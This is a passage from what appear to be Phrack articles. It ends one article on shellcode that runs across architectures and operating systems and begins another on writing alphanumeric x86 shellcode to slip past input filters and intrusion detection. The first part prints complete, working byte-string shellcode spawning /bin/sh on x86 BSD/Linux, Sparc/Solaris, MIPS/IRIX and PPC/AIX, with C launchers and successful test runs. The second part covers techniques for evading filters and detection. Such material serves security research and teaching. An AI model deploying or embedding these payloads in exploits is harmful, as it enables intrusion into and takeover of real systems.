significant bits specify the instruction opcode [6][7]. There are 3 instruction formats: I-Type (immediate), J-Type (Jump) and R-Type (Register). Since we are looking for a nop-like instructions we are mostly interesting in I and R type instructions whose format is listed below. I-Type instruction format: 31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 .. 0 op | rs | rt | immediate fields are: op 6-bit operation code rs 5-bit source register specifier rt 5-bit target (src/dest) or branch condition immediate 16-bit immediate, branch or address displacement R-Type instruction format: 31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 14 131211|109876|5..0 op | rs | rt | rd | shamt|funct fields are: op 6-bit operation code rs 5-bit source register specifier rt 5-bit target (src/dest) or branch condition rd 5-bit destination register specifier shamt 5-bit shift amount funct 6-bit function field Sparc architecture ------------------ Similarly to MIPS, Sparc is a RISC based architecture. All the Sparc instructions occupy 32 bits and the two most significant bits specify an instruction class [4]: op Instruction Class 00 Branch instructions 01 call instruction 10 Format Three instructions (type 1) 11 Format Three instructions (type 2) Format one call instruction contains an op field '01' followed by 30 bits of address. Even though this is the optimal instruction to use, since we control 30 bits out of 32, we won't be able to use it since the jumps are not relative and tend to have 0 bytes in them. Format three instructions (type 2) are mostly load/store instructions which are mostly useless to us since we are only looking for relatively harmless nop-like instructions. We definitely don't want to use anything that has possibility of crashing our program (SIGSEGV in case of an illegal load/store). This leaves us with branch and format three instructions (type 1) to use. Here is the format of a format three instruction: 31 30 |29 28 27 26 25|24 23 22 21 20 19|18 17 16 15 14|13|12 11 10 9 8 7..0 op | rd | op3 | rs1 |01| rs2 / imm fields are: op 2-bit instruction class (10) rd 5-bit destination register specifier op3 5-bit instruction specifier rs1 5-bit source register 0/1 1-bit constant / second source register option rs2 / imm 13-bit specifies either a second source register or a constant Some of the promising looking (harmless) format three instructions are add, and, or, xor and sll/srl (specified by op3 bits). And here is the branch instruction format: 31 30 |29|28 27 26 25|24 23 22|21 .. 0 op |a | condition | op2 |displacement fields are: op 2-bit instruction class (00) a 1-bit annulled flag condition 5-bit condition specifier.. ba, bn, bl, ble, be, etc op2 3-bit condition code (integer condition code is 010) displacement 22-bit address displacement As you can see, a lot of the fields already have predefined values which we need to work around. PPC architecture ---------------- PowerPC is yet another RISC architecture used by vendors such as IBM and Apple. See LSD's paper [8] for more information. x86 architecture ---------------- The topic of buffer overflows and shellcode on x86 architecture has been beaten to death before. For a good introduction see Aleph1's article in phrack 49 [3]. To expand just a little bit on the topic I am going to present x86 code that works on multiple x86 operating systems. The idea behind an "OS spanning" shellcode is to setup all the registers and stack in such a way as to satisfy the requirements of all the operating systems that our shellcode is meant to execute on. For example, BSD passes its parameters on stack while Linux uses registers (for passing arguments to syscalls). If we setup both registers and stack than our code would run on both BSD and Linux x86 systems. The only problem with writing shellcode for BSD & Linux systems is the different execve() syscall numbers the two systems use. Linux uses syscall number 0xb while BSD uses 0x3b. To overcome this problem, we need to distinguish between the two systems at runtime. There are plenty of ways to do that such as checking where various segments are mapped, the way segment registers are setup, etc. I chose to analyze the segment registers since that method seems to be pretty robust. On Linux systems, for example, segment registers fs and gs are set 0 (in user mode) while on BSD systems they are set to non zero values (0x1f on OpenBSD, 0x2f on FreeBSD). We can exploit that difference to distinguish between the two different systems. See "Adding more architectures" section for a working example. Another way to to handle different syscall numbers is to ignore an "invalid system call" SIGSYS signal and just try a different syscall number if the first execve() call failed. While that method certainly works it is quite limited and cannot be applied to other operating systems such as the x86 Solaris which doesn't use the 0x80 interrupt trap gate. Note that the "OS Spanning" shellcode is certainly not restricted to an x86 platform, the same idea can be applied to any hardware platform and any operating system. Putting it all together.. Architecture spanning shellcode --------------------------------------------------------- As I have mentioned before our shellcode (first attempt) is going to look like XXX arch1 shellcode arch2 shellcode where XXX is a specially crafted string that executes different instructions on two different platforms. When I initially started looking for a working XXX string, I took an x86 short jump instruction and tried to decode it on a sun box. Since the first byte of an x86 short jump instruction is 0xEB (which is almost all 1's) [5], the instruction decoded into a weird format 3 sparc instruction. My next attempt consisted of writing a sparc jump instruction and trying to decode it on an x86 platform. That idea almost worked but i was unable to decode the sparc jump instruction into a nop-like x86 xor instruction due to a one bit offset difference. The next attempt consisted of padding an x86 jump instruction. Since an x86 short jump instruction is 2 bytes long and all the sparc instructions are 4 bytes long, I had 2 bytes to play with. I knew that I had to insert some bytes before the jump 0xEB byte in order to be able to decode the instruction into something reasonable on sparc. For my pad bytes I chose to use the x86 0x90 nop bytes which turned out to be a good idea since 0x90 is mostly all 0's. My instruction stream than looked like \x90\x90\xeb\x30 where 0x90 is the x86 nop instruction, 0xEB is the opcode for an x86 short jump and 0x30 is a 48 byte jump offset. Here is what the above string decoded to on a Sun machine: (gdb) x 0x1054c 0x1054c : 0x9090eb30 (gdb) x/t 0x1054c 0x1054c : 10010000100100001110101100110000 (gdb) x/i 0x1054c 0x1054c : orcc %g3, 0xb30, %o0 As you can see, our string decoded to a harmless format 3 'or' instruction that corrupted the %o0 register. This is exactly what we were looking for, a short jump on one architecture (x86) and a harmless instruction on another architecture (sparc). With that in mind our shellcode now looks like this: \x90\x90\xeb\x30 [sparc shellcode] [x86 shellcode] Let's try it out.. [openbsd]$ cat ass.c ; ass as in Architecture Spanning Shellcode :) char sc[] = /* magic string */ "\x90\x90\xeb\x30" /* sparc solaris execve() */ "\x2d\x0b\xd8\x9a" /* sethi $0xbd89a, %l6 */ "\xac\x15\xa1\x6e" /* or %l6, 0x16e, %l6 */ "\x2f\x0b\xdc\xda" /* sethi $0xbdcda, %l7 */ "\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 */ "\x92\x03\xa0\x08" /* add %sp, 8, %o1 */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x9c\x03\xa0\x10" /* add %sp, 0x10, %sp */ "\xec\x3b\xbf\xf0" /* std %l6, [%sp - 0x10] */ "\xdc\x23\xbf\xf8" /* st %sp, [%sp - 0x08] */ "\xc0\x23\xbf\xfc" /* st %g0, [%sp - 0x04] */ "\x82\x10\x20\x3b" /* mov $0x3b, %g1 */ "\x91\xd0\x20\x08" /* ta 8 */ /* BSD execve() */ "\xeb\x17" /* jmp */ "\x5e" /* pop %esi */ "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x88\x46\x07" /* mov %al,0x7(%esi) */ "\x89\x46\x0c" /* mov %eax,0xc(%esi) */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\x8d\x5e\x08" /* lea 0x8(%esi),%ebx */ "\x53" /* push %ebx */ "\x56" /* push %esi */ "\x50" /* push %eax */ "\xb0\x3b" /* mov $0x3b, %al */ "\xcd\x80" /* int $0x80 */ "\xe8\xe4\xff\xff\xff" /* call */ "\x2f\x62\x69\x6e\x2f\x73\x68"; /* /bin/sh */ int main(void) { void (*f)(void) = (void (*)(void)) sc; f(); return 0; } [openbsd]$ gcc ass.c [openbsd]$ ./a.out $ uname -ms OpenBSD i386 [solaris]$ gcc ass.c [solaris]$ ./a.out $ uname -ms SunOS sun4u it worked! Adding more architectures ------------------------- Theoretically, spanning shellcode is not tied to any specific operating system nor any specific hardware architecture. Thus it should be possible to write shellcode that runs on more than two architectures. The format for our shellcode (second attempt) that runs on 3 architectures is going to be XXX YYY arch1 shellcode arch2 shellcode arch3 shellcode where arch1 is MIPS, arch2 is Sparc and arch3 is x86. My first attempt was to try and reuse the magic string from ass.c. Unfortunately, 0x9090eb30 didn't decode into anything reasonable on an IRIX platform and so I was forced to look elsewhere. My next attempt was to replace 0x90 bytes with some other nop-like bytes looking for a sequence that would work on both Sparc & MIPS platforms. After a trying out a bunch of x86 nop instructions from K2's ADMmutate toolkit, I stumbled upon an AAA instruction whose opcode was 0x37. The AAA instruction worked out great since the 0x3737eb30 string decoded correctly on all three platforms: x86: aaa aaa jmp +120 sparc: sethi %hi(0xdFADE000), %i3 mips: ori $s7,$t9,0xeb78 with XXX string out of the way, I was left with MIPS and Sparc platforms YYY part. The very first instruction I tried worked on both platforms. The instruction was a Sparc annulled short jump ba,a (0x30800012) which decoded to andi $zero,$a0,0x12 on a MIPS platform. Not only did the jump instruction decoded to a harmless 'andi' on a MIPS platform, it also didn't require a branch delay slot instruction after it since the ba jump was annulled [4]. So now our shellcode looks like this "\x37\x37\xeb\x78" /* x86: aaa; aaa; jmp 116+4 */ /* MIPS: ori $s7,$t9,0xeb78 */ /* Sparc: sethi %hi(0xdfade000),%i3*/ "\x30\x80\x00\x12" /* MIPS: andi $zero,$a0,0x12 */ /* Sparc: ba,a +72 */ [snip real shellcode] While we are adding more architectures to our shellcode let's also take a look at PPC/AIX. The first logical thing to do is to try and decode the existing XXX and YYY strings from the above shellcode on the PPC platform: (gdb) x 0x10000364 0x10000364 : 0x3737eb78 (gdb) x/i 0x10000364 0x10000364 : addic. r25,r23,-5256 (gdb) x/x 0x10000368 0x10000368 : 0x30800012 (gdb) x/i 0x10000368 0x10000368 : addic r4,r0,18 is this our lucky day or what? the XXX and YYY strings from the above MIPS/x86/Sparc combo have correctly decoded to two harmless add instructions. All we need to do now is to come up with another instruction that is going to execute a jump on a MIPS platform while executing a nop on PPC/AIX. After a bit of searching MIPS 'bgtz' instruction turned out to decode into a valid multiply instruction on AIX: [MIPS] (gdb) x 0x10001008 0x10001008 : 0x1ee00101 (gdb) x/i 0x10001008 0x10001008 : bgtz $s7,0x10001410 <+1040> [AIX] (gdb) x 0x10000378 0x10000378 : 0x1ee00101 (gdb) x/i 0x10000378 0x10000378 : mulli r23,r0,257 the bgtz instruction is a branch on greater than zero [7]. Notice that the branch instruction uses the $s7 register which was modified by us in a previous nop instruction. The branch displacement is set to 0x0101 (to avoid NULL bytes in the instruction) which is equivalent to a relative 1028 byte forward jump. Let's put everything together now.. [openbsd]$ cat ass.c /* * Architecture/OS Spanning Shellcode * * runs on x86 (freebsd, netbsd, openbsd, linux), MIPS/Irix, Sparc/Solaris * and PPC/AIX (AIX platforms require -DAIX compiler flag) * * eugene@gravitino.net */ char sc[] = /* voodoo */ "\x37\x37\xeb\x7b" /* x86: aaa; aaa; jmp 116+4 */ /* MIPS: ori $s7,$t9,0xeb7b */ /* Sparc: sethi %hi(0xdFADEc00), %i3 */ /* PPC/AIX: addic. r25,r23,-5253 */ "\x30\x80\x01\x14" /* MIPS: andi $zero,$a0,0x114 */ /* Sparc: ba,a +1104 */ /* PPC/AIX: addic r4,r0,276 */ "\x1e\xe0\x01\x01" /* MIPS: bgtz $s7, +1032 */ /* PPC/AIX: mulli r23,r0,257 */ "\x30\x80\x01\x14" /* fill in the MIPS branch delay slot with the above MIPS / AIX nop */ /* PPC/AIX shellcode by LAST STAGE OF DELIRIUM *://lsd-pl.net/ */ "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x04\x82\x53\x71" "\x87\xa0\x89\xfc" "\x69\x68\x67\x65" "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca 0x0 */ "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */ "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd" /* bnel */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08" /* cal r3,-248(r31) */ "\x38\x9f\xff\x10" /* cal r4,-240(r31) */ "\x90\x7f\xff\x10" /* st r3,-240(r31) */ "\x90\xbf\xff\x14" /* st r5,-236(r31) */ "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */ "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "/bin/sh" /* x86 BSD/Linux execve() by me */ "\xeb\x29" /* jmp */ "\x5e" /* pop %esi */ "\x31\xc0" /* xor %eax, %eax */ "\x50" /* push %eax */ "\x88\x46\x07" /* mov %al,0x7(%esi) */ "\x89\x46\x0c" /* mov %eax,0xc(%esi) */ "\x89\x76\x08" /* mov %esi,0x8(%esi) */ "\x8d\x5e\x08" /* lea 0x8(%esi),%ebx */ "\x53" /* push %ebx */ "\x56" /* push %esi */ "\x50" /* push %eax */ /* setup registers for linux */ "\x8d\x4e\x08" /* lea 0x8(%esi),%ecx */ "\x8d\x56\x08" /* lea 0x8(%esi),%edx */ "\x89\xf3" /* mov %esi, %ebx */ /* distinguish between BSD & Linux */ "\x8c\xe0" /* movl %fs, %eax */ "\x21\xc0" /* andl %eax, %eax */ "\x74\x04" /* jz +4 */ "\xb0\x3b" /* mov $0x3b, %al */ "\xeb\x02" /* jmp +2 */ "\xb0\x0b" /* mov $0xb, %al */ "\xcd\x80" /* int $0x80 */ "\xe8\xd2\xff\xff\xff" /* call */ "\x2f\x62\x69\x6e" /* /bin */ "\x2f\x73\x68" /* /sh */ /* * pad the MIPS/Irix & Sparc/Solaris shellcodes * jumps of > 0x0101 bytes are performed on both platforms * to avoid NULL bytes in the jump instructions */ "2359595912811011811145128130124118116118121114127231291301241171" "2911813245571341291181211101231241181291101234512913012411712911" "8132455712712412112411245123118120128451291301241171291181324512" "9128118133114451141004559113130110111451141171294511512445134129" "1301101141112311411712945571171121291181321284511411712945113123" "1104512312412712911211412111445114117129451151244511312112712413" "2451141171294559595913212412345113121127124132451271301244512811" "8451281181179797117118128451181284512413012745132124127121113451" "2312413259595945129117114451321241271211134512411545129117114451" "1412111411212912712412345110123113451291171144512813211812911211" "7574512911711423111114110130129134451241154512911711445111110130" "1135945100114451141331181281294513211812911712413012945128120118" "1234511212412112412757451321181291171241301294512311012911812412" "31101211181291345745132118" /* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso */ "\xaf\xa0\xff\xfc" /* sw $zero, -4($sp) */ "\x24\x06\x73\x50" /* li $a2, 0x7350 */ "\x04\xd0\xff\xff" /* bltzal $a2, dpatch */ "\x8f\xa6\xff\xfc" /* lw $a2, -4($sp) */ /* a2 = (char **) envp = NULL */ "\x24\x0f\xff\xcb" /* li $t7, -53 */ "\x01\xe0\x78\x27" /* nor $t7, $t7, $zero */ "\x03\xef\xf8\x21" /* addu $ra, $ra, $t7 */ /* a0 = (char *) pathname */ "\x23\xe4\xff\xf8" /* addi $a0, $ra, -8 */ /* fix 0x42 dummy byte in pathname to shell */ "\x8f\xed\xff\xfc" /* lw $t5, -4($ra) */ "\x25\xad\xff\xbe" /* addiu $t5, $t5, -66 */ "\xaf\xed\xff\xfc" /* sw $t5, -4($ra) */ /* a1 = (char **) argv */ "\xaf\xa4\xff\xf8" /* sw $a0, -8($sp) */ "\x27\xa5\xff\xf8" /* addiu $a1, $sp, -8 */ "\x24\x02\x04\x23" /* li $v0, 1059 (SYS_execve) */ "\x01\x01\x01\x0c" /* syscall */ "\x2f\x62\x69\x6e" /* .ascii "/bin" */ "\x2f\x73\x68\x42" /* .ascii "/sh", .byte 0xdummy */ /* Sparc Solaris execve() by an unknown author */ "\x2d\x0b\xd8\x9a" /* sethi $0xbd89a, %l6 */ "\xac\x15\xa1\x6e" /* or %l6, 0x16e, %l6 */ "\x2f\x0b\xdc\xda" /* sethi $0xbdcda, %l7 */ "\x90\x0b\x80\x0e" /* and %sp, %sp, %o0 */ "\x92\x03\xa0\x08" /* add %sp, 8, %o1 */ "\x94\x1a\x80\x0a" /* xor %o2, %o2, %o2 */ "\x9c\x03\xa0\x10" /* add %sp, 0x10, %sp */ "\xec\x3b\xbf\xf0" /* std %l6, [%sp - 0x10] */ "\xdc\x23\xbf\xf8" /* st %sp, [%sp - 0x08] */ "\xc0\x23\xbf\xfc" /* st %g0, [%sp - 0x04] */ "\x82\x10\x20\x3b" /* mov $0x3b, %g1 */ "\x91\xd0\x20\x08" /* ta 8 */ ; int main(void) { #if defined(AIX) /* copyright LAST STAGE OF DELIRIUM feb 2001 poland */ int jump[2]={(int)sc,*((int*)&main+1)}; ((*(void (*)())jump)()); #else void (*f)(void) = (void (*)(void)) sc; f(); #endif return 0; } [openbsd]$ gcc ass.c [openbsd]$ ./a.out $ uname -ms OpenBSD i386 [freebsd]$ gcc ass.c [freebsd]$ ./a.out $ uname -ms FreeBSD i386 [linux]$ gcc ass.c [linux]$ ./a.out $ uname -ms Linux i686 [solaris]$ gcc ass.c [solaris]$ ./a.out $ uname -ms SunOS sun4u [irix]$ gcc ass.c [irix]$ ./a.out $ uname -ms IRIX IP22 [aix]$ gcc ass.c [aix]$ ./a.out $ uname -ms AIX 000089101000 Conclusion ----------- Architecture spanning shellcode is a specially crafted code that executes differently depending on the architecture it is being run on. The code achieves that by using a series of bytes which execute differently on different architectures. OS spanning shellcode is specially crafted code that executes on multiple operating systems all running on the same platform. The code achieves that by setting up the registers and the stack in a way that satisfies the operating systems that the code is being run on. Credits / Thanks ---------------- Greg Hoglund working with me on this idea at the challenge party prole and harm for coming with an idea way before the challenge http://www.redgeek.net/~prole/ASSC.txt gravitino.net, GHI, skyper, spoonm References ---------- [1] Caezar's challenge http://www.caezarschallenge.org [2] Writing MIPS/IRIX shellcode scut (phrack 56) [3] Smashing The Stack For Fun And Profit Aleph One (phrack 49) [4] SPARC Architecture, Assembly Language Programming, and C. 2nd ed. Richard P. Paul [5] IA-32 Intel Architecture, Software Developer's Manual Intel, Corp http://developer.intel.com [6] Computer Organization and Design David A. Patterson and John L. Hennessy [7] MIPS RISC Architecture Gerry Kane and Joe Heinrich [8] UNIX Assembly Codes Development for Vulnerabilities Illustration Purposes The Last Stage of Delirium Research Group http://lsd-pl.net |=[ EOF ]=---------------------------------------------------------------=| ==Phrack Inc.== Volume 0x0b, Issue 0x39, Phile #0x0f of 0x12 |=--------------=[ Writing ia32 alphanumeric shellcodes ]=---------------=| |=-----------------------------------------------------------------------=| |=--------------------------=[ rix@hert.org ]=---------------------------=| ----| Introduction Today, more and more exploits need to be written using assembler, particularly to write classical shellcodes (for buffer overflows, or format string attacks,...). Many programs now achieve powerfull input filtering, using functions like strspn() or strcspn(): it prevents people from easily inserting shellcodes in different buffers. In the same way, we observe more and more IDS detecting suspicious opcodes sequences, some of them indicating the presence of a shellcode. One way to evade such pattern matching techniques is to use polymorphic stuff, like using tools such as K2's ADMmutate. Another way to do this is going to be presented here: we'll try to write IA32 non filterable shellcodes, using only alphanumeric chars: more precisely, we'll use only chars like '0'->'9','A'->'Z' and 'a'->'z'. If we can write such alphanumeric shellcodes, we will be able to store our shellcodes nearly everywhere! Let's enumerate some interesting possibilities: - filtered inputs - environment variables - classical commands, instructions & parameters from usual protocols - filenames & directories - usernames & passwords - ... ----| The usable instructions Before beginning to think about particular techniques, let's first have a look at the IA32 instructions that will be interesting for us. First of all, some conventions (from Intel references) that we'll use in our summary arrays: : indicates a byte register. : indicates a doubleword register. : indicates a byte register or a byte from memory (through a pointer). : indicates a doubleword register or a doubleword from memory (through a pointer). : indicates that the instruction byte is followed of possibly several operand bytes. One of those bytes, the "ModR/M byte", permits us to specify the used addressing form,with the help of 3 bit fields. ModR/M byte: 7 6 5 4 3 2 1 0 +---+-----+-----+ |mod| r | r/m | +---+-----+-----+ In this case, the indicates us the ModR/M byte will contain a register operand and a register or memory operand. : indicates an immediate byte value. : indicates an immediate doubleword value. : indicates a signed 8 bits displacement. : indicates a signed 32 bits displacement. <...> : indicates the instruction possibly need some operands (eventually encoded on several operand bytes). ALPHANUMERIC OPCODES: Now, let's remember all instructions with alphanumeric opcodes: hexadecimal opcode | char | instruction | interesting -------------------+------+--------------------------------+------------ 30 | '0' | xor , | YES 31 | '1' | xor , | YES 32 | '2' | xor , | YES 33 | '3' | xor , | YES 34 | '4' | xor al, | YES 35 | '5' | xor eax, | YES 36 | '6' | ss: (Segment Override Prefix)| 37 | '7' | aaa | 38 | '8' | cmp , | YES 39 | '9' | cmp , | YES | | | 41 | 'A' | inc ecx | YES 42 | 'B' | inc edx | YES 43 | 'C' | inc ebx | YES 44 | 'D' | inc esp | YES 45 | 'E' | inc ebp | YES 46 | 'F' | inc esi | YES 47 | 'G' | inc edi | YES 48 | 'H' | dec eax | YES 49 | 'I' | dec ecx | YES 4A | 'J' | dec edx | YES 4B | 'K' | dec ebx | YES 4C | 'L' | dec esp | YES 4D | 'M' | dec ebp | YES 4E | 'N' | dec esi | YES 4F | 'O' | dec edi | YES 50 | 'P' | push eax | YES 51 | 'Q' | push ecx | YES 52 | 'R' | push edx | YES 53 | 'S' | push ebx | YES 54 | 'T' | push esp | YES 55 | 'U' | push ebp | YES 56 | 'V' | push esi | YES 57 | 'W' | push edi | YES 58 | 'X' | pop eax | YES 59 | 'Y' | pop ecx | YES 5A | 'Z' | pop edx | YES | | | 61 | 'a' | popa | YES 62 <...> | 'b' | bound <...> | 63 <...> | 'c' | arpl <...> | 64 | 'd' | fs: (Segment Override Prefix)| 65 | 'e' | gs: (Segment Override Prefix)| 66 | 'f' | o16: (Operand Size Override)| YES 67 | 'g' | a16: (Address Size Override)| 68 | 'h' | push | YES 69 <...> | 'i' | imul <...> | 6A | 'j' | push | YES 6B <...> | 'k' | imul <...> | 6C <...> | 'l' | insb <...> | 6D <...> | 'm' | insd <...> | 6E <...> | 'n' | outsb <...> | 6F <...> | 'o' | outsd <...> | 70 | 'p' | jo | YES 71 | 'q' | jno | YES 72 | 'r' | jb | YES 73 | 's' | jae | YES 74 | 't' | je | YES 75 | 'u' | jne | YES 76 | 'v' | jbe | YES 77 | 'w' | ja | YES 78 | 'x' | js | YES 79 | 'y' | jns | YES 7A | 'z' | jp | YES What can we directly deduct of all this? - NO "MOV" INSTRUCTIONS: => we need to find another way to manipulate our data. - NO INTERESTING ARITHMETIC INSTRUCTIONS ("ADD","SUB",...): => we can only use DEC and INC. => we can't use INC with the EAX register. - THE "XOR" INSTRUCTION: => we can use XOR with bytes and doublewords. => very interesting for basic crypto stuff. - "PUSH"/"POP"/"POPAD" INSTRUCTIONS: => we can push bytes and doublewords directly on the stack. => we can only use POP with the EAX,ECX and EDX registers. => it seems we're going to play again with the stack. - THE "O16" OPERAND SIZE OVERRIDE: => we can also achieve 16 bits manipulations with this instruction prefix. - "JMP" AND "CMP" INSTRUCTIONS: => we can realize some comparisons. => we can't directly use constant values with CMP. Besides, Don't forget that operands of these instructions (, , , and ) must also remain alphanumeric. It may make our task once again more complicated... THE "ModR/M" BYTE: For example, let's observe the effect of this supplementary constraint on the ModR/M byte (), particularly for XOR and CMP. In the next array, we'll find all the possible values for this ModR/M byte, and their interpretation as / (first row) and (first column) operands. :| al | cl | dl | bl | ah | ch | dh | bh :| eax | ecx | edx | ebx | esp | ebp | esi | edi | | | | | | | | --:-------------+------+------+------+------+------+------+------+------ (mod=00) | | | | | | | | [eax] |00 |08 |10 |18 |20 |28 |30 '0'|38 '8' [ecx] |01 |09 |11 |19 |21 |29 |31 '1'|39 '9' [edx] |02 |0A |12 |1A |22 |2A |32 '2'|3A [ebx] |03 |0B |13 |1B |23 |2B |33 '3'|3B [] |04 |0C |14 |1C |24 |2C |34 '4'|3C [] |05 |0D |15 |1D |25 |2D |35 '5'|3D [esi] |06 |0E |16 |1E |26 |2E |36 '6'|3E [edi] |07 |0F |17 |1F |27 |2F |37 '7'|3F ----------------+------+------+------+------+------+------+------+------ (mod=01) | | | | | | | | [eax+] |40 |48 'H'|50 'P'|58 'X'|60 |68 'h'|70 'p'|78 'x' [ecx+] |41 'A'|49 'I'|51 'Q'|59 'Y'|61 'a'|69 'i'|71 'q'|79 'y' [edx+] |42 'B'|4A 'J'|52 'R'|5A 'Z'|62 'b'|6A 'j'|72 'r'|7A 'z' [ebx+] |43 'C'|4B 'K'|53 'S'|5B |63 'c'|6B 'k'|73 's'|7B [+] |44 'D'|4C 'L'|54 'T'|5C |64 'd'|6C 'l'|74 't'|7C [ebp+] |45 'E'|4D 'M'|55 'U'|5D |65 'e'|6D 'm'|75 'u'|7D [esi+] |46 'F'|4E 'N'|56 'V'|5E |66 'f'|6E 'n'|76 'v'|7E [edi+] |47 'G'|4F 'O'|57 'W'|5F |67 'g'|6F 'o'|77 'w'|7F ----------------+------+------+------+------+------+------+------+------ (mod=10) | | | | | | | | [eax+] |80 |88 |90 |98 |A0 |A8 |B0 |B8 [ecx+] |81 |89 |91 |99 |A1 |A9 |B1 |B9 [edx+] |82 |8A |92 |9A |A2 |AA |B2 |BA [ebx+] |83 |8B |93 |9B |A3 |AB |B3 |BB [+]|84 |8C |94 |9C |A4 |AC |B4 |BC [ebp+] |85 |8D |95 |9D |A5 |AD |B5 |BD [esi+] |86 |8E |96 |9E |A6 |AE |B6 |BE [edi+] |87 |8F |97 |9F |A7 |AF |B7 |BF ---+------------+------+------+------+------+------+------+------+------ (mod=11) | | | | | | | | al | eax |C0 |C8 |D0 |D8 |E0 |E8 |F0 |F8 cl | ecx |C1 |C9 |D1 |D9 |E1 |E9 |F1 |F9 dl | edx |C2 |CA |D2 |DA |E2 |EA |F2 |FA bl | ebx |C3 |CB |D3 |DB |E3 |EB |F3 |FB ah | esp |C4 |CC |D4 |DC |E4 |EC |F4 |FC ch | ebp |C5 |CD |D5 |DD |E5 |ED |F5 |FD dh | esi |C6 |CE |D6 |DE |E6 |EE |F6 |FE bh | edi |C7 |CF |D7 |DF |E7 |EF |F7 |FF What can we deduct this time for XOR and CMP? - SOME "xor [],dh" AND "xor [],bh" INSTRUCTIONS. - THE "xor [],dh" INSTRUCTION. - SOME "xor [+]," INSTRUCTIONS. - NO "xor ," INSTRUCTIONS. - SOME "xor [],esi" AND "xor [],edi" INSTRUCTIONS. - THE "xor [],esi" INSTRUCTION. - SOME "xor [+]," INSTRUCTIONS. - NO "xor ," INSTRUCTIONS. - SOME "xor dh,[]" AND "xor bh,[]" INSTRUCTIONS. - THE "xor dh,[]" INSTRUCTION. - SOME "xor ,[+]" INSTRUCTIONS. - SOME "xor esi,[]" AND "xor edi,[]" INSTRUCTIONS. - THE "xor esi,[]" INSTRUCTION. - SOME "xor ,[+]" INSTRUCTIONS. - SOME "cmp [],dh" AND "cmp [],bh" INSTRUCTIONS. - THE "cmp [],dh" INSTRUCTION. - SOME "cmp [+]," INSTRUCTIONS. - NO "cmp ," INSTRUCTIONS. - SOME "cmp [],esi" AND "cmp [],edi" INSTRUCTIONS. - THE "cmp [],esi" INSTRUCTION. - SOME "cmp [+]," INSTRUCTIONS. - NO "cmp ," INSTRUCTIONS. THE "SIB" BYTE: To be complete, we must also analyze possibilities offered by the Scale Index Base byte ("" in our last array). This SIB byte allows us to create addresses having the following form: = +(2^)* Where: : indicate a base register. : indicate an index register. : indicate a scale factor for the index register. Here are the different bit fields of this byte: 7 6 5 4 3 2 1 0 +---+-----+-----+ |sc.|index|base | +---+-----+-----+ Let's have a look at this last array: :| eax | ecx | edx | ebx | esp | ebp | esi | edi | | | | | | (if | | (2^)| | | | | | MOD | | * | | | | | | !=00)| | ----:------+------+------+------+------+------+------+------+------ eax |00 |01 |02 |03 |04 |05 |06 |07 ecx |08 |09 |0A |0B |0C |0D |0E |0F edx |10 |11 |12 |13 |14 |15 |16 |17 ebx |18 |19 |1A |1B |1C |1D |1E |1F 0 |20 |21 |22 |23 |24 |25 |26 |27 ebp |28 |29 |2A |2B |2C |2D |2E |2F esi |30 '0'|31 '1'|32 '2'|33 '3'|34 '4'|35 '5'|36 '6'|37 '7' edi |38 '8'|39 '9'|3A |3B |3C |3D |3E |3F -----------+------+------+------+------+------+------+------+------ 2*eax |40 |41 'A'|42 'B'|43 'C'|44 'D'|45 'E'|46 'F'|47 'G' 2*ecx |48 'H'|49 'I'|4A 'J'|4B 'K'|4C 'L'|4D 'M'|4E 'N'|4F 'O' 2*edx |50 'P'|51 'Q'|52 'R'|53 'S'|54 'T'|55 'U'|56 'V'|57 'W' 2*ebx |58 'X'|59 'Y'|5A 'Z'|5B |5C |5D |5E |5F 0 |60 |61 'a'|62 'b'|63 'c'|64 'd'|65 'e'|66 'f'|67 'g' 2*ebp |68 'h'|69 'i'|6A 'j'|6B 'k'|6C 'l'|6D 'm'|6E 'n'|6F 'o' 2*esi |70 'p'|71 'q'|72 'r'|73 's'|74 't'|75 'u'|76 'v'|77 'w' 2*edi |78 'x'|79 'y'|7A 'z'|7B |7C |7D |7E |7F -----------+------+------+------+------+------+------+------+------ 4*eax |80 |81 |82 |83 |84 |85 |86 |87 4*ecx |88 |89 |8A |8B |8C |8D |8E |8F 4*edx |90 |91 |92 |93 |94 |95 |96 |97 4*ebx |98 |99 |9A |9B |9C |9D |9E |9F 0 |A0 |A1 |A2 |A3 |A4 |A5 |A6 |A7 4*ebp |A8 |A9 |AA |AB |AC |AD |AE |AF 4*esi |B0 |B1 |B2 |B3 |B4 |B5 |B6 |B7 4*edi |B8 |B9 |BA |BB |BC |BD |BE |BF -----------+------+------+------+------+------+------+------+------ 8*eax |C0 |C1 |C2 |C3 |C4 |C5 |C6 |C7 8*ecx |C8 |C9 |CA |CB |CC |CD |CE |CF 8*edx |D0 |D1 |D2 |D3 |D4 |D5 |D6 |D7 8*ebx |D8 |D9 |DA |DB |DC |DD |DE |DF 0 |E0 |E1 |E2 |E3 |E4 |E5 |E6 |E7 8*ebp |E8 |E9 |EA |EB |EC |ED |EE |EF 8*esi |F0 |F1 |F2 |F3 |F4 |F5 |F6 |F7 8*edi |F8 |F9 |FA |FB |FC |FD |FE |FF -----------+------+------+------+------+------+------+------+------ (if | ==ebp | => = +(2^)* and MOD==0)| -----------+------------------------------------------------------- What can we deduct of this last array? - SOME 